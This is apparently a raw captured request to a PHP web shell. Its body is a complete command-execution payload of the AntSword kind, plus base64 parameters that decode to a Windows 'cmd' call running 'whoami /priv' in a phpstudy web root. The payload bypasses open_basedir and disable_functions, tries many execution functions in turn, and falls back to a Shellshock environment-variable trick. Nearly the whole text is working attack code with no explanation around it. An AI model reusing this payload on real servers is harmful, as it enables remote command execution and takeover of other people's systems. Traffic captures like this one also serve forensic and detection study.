1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160
| <?php @ini_set("display_errors", "0"); @set_time_limit(0); $opdir = @ini_get("open_basedir"); if ($opdir) { $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]); $oparr = preg_split("/;|:/", $opdir); @array_push($oparr, $ocwd, sys_get_temp_dir()); foreach ($oparr as $item) { if (!@is_writable($item)) { continue; }; $tmdir = $item . "/.c46a89a"; @mkdir($tmdir); if (!@file_exists($tmdir)) { continue; } @chdir($tmdir); @ini_set("open_basedir", ".."); $cntarr = @preg_split("/\\\\|\//", $tmdir); for ($i = 0; $i < sizeof($cntarr); $i++) { @chdir(".."); }; @ini_set("open_basedir", "/"); @rmdir($tmdir); break; }; };; function asenc($out) { return $out; }
; function asoutput() { $output = ob_get_contents(); ob_end_clean(); echo "79c2" . "0b92"; echo @asenc($output); echo "b4e7e" . "465b62"; }
ob_start(); try { $p = base64_decode(substr($_POST["yee092cda97a62"], 2)); $s = base64_decode(substr($_POST["q8fb9d4c082c11"], 2)); $envstr = @base64_decode(substr($_POST["p48a6d55fac1b1"], 2)); $d = dirname($_SERVER["SCRIPT_FILENAME"]); $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\""; if (substr($d, 0, 1) == "/") { @putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"); } else { @putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } if (!empty($envstr)) { $envarr = explode("|||asline|||", $envstr); foreach ($envarr as $v) { if (!empty($v)) { @putenv(str_replace("|||askey|||", "=", $v)); } } } $r = "{$p} {$c}"; function fe($f) { $d = explode(",", @ini_get("disable_functions")); if (empty($d)) { $d = array(); } else { $d = array_map('trim', array_map('strtolower', $d)); } return (function_exists($f) && is_callable($f) && !in_array($f, $d)); }
; function runshellshock($d, $c) { if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(sys_get_temp_dir(), 'as'); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); if (fe('error_log')) { error_log("a", 1); } else { mail("[email protected]", "", "", "-bv"); } } else { return False; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { print($output); return True; } } return False; }
; function runcmd($c) { $ret = 0; $d = dirname($_SERVER["SCRIPT_FILENAME"]); if (fe('system')) { @system($c, $ret); } elseif (fe('passthru')) { @passthru($c, $ret); } elseif (fe('shell_exec')) { print(@shell_exec($c)); } elseif (fe('exec')) { @exec($c, $o, $ret); print(join(" ", $o)); } elseif (fe('popen')) { $fp = @popen($c, 'r'); while (!@feof($fp)) { print(@fgets($fp, 2048)); } @pclose($fp); } elseif (fe('proc_open')) { $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!@feof($io[1])) { print(@fgets($io[1], 2048)); } while (!@feof($io[2])) { print(@fgets($io[2], 2048)); } @fclose($io[1]); @fclose($io[2]); @proc_close($p); } elseif (fe('antsystem')) { @antsystem($c); } elseif (runshellshock($d, $c)) { return $ret; } elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) { $w = new COM('WScript.shell'); $e = $w->exec($c); $so = $e->StdOut(); $ret .= $so->ReadAll(); $se = $e->StdErr(); $ret .= $se->ReadAll(); print($ret); } else { $ret = 127; } return $ret; }
; $ret = @runcmd($r . " 2>&1"); print ($ret != 0) ? "ret={$ret}" : "";; } catch (Exception $e) { echo "ERROR://" . $e->getMessage(); }; asoutput(); die(); & p48a6d55fac1b1 = 3G & q8fb9d4c082c11 = 8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4 & yee092cda97a62 = yqY21k
|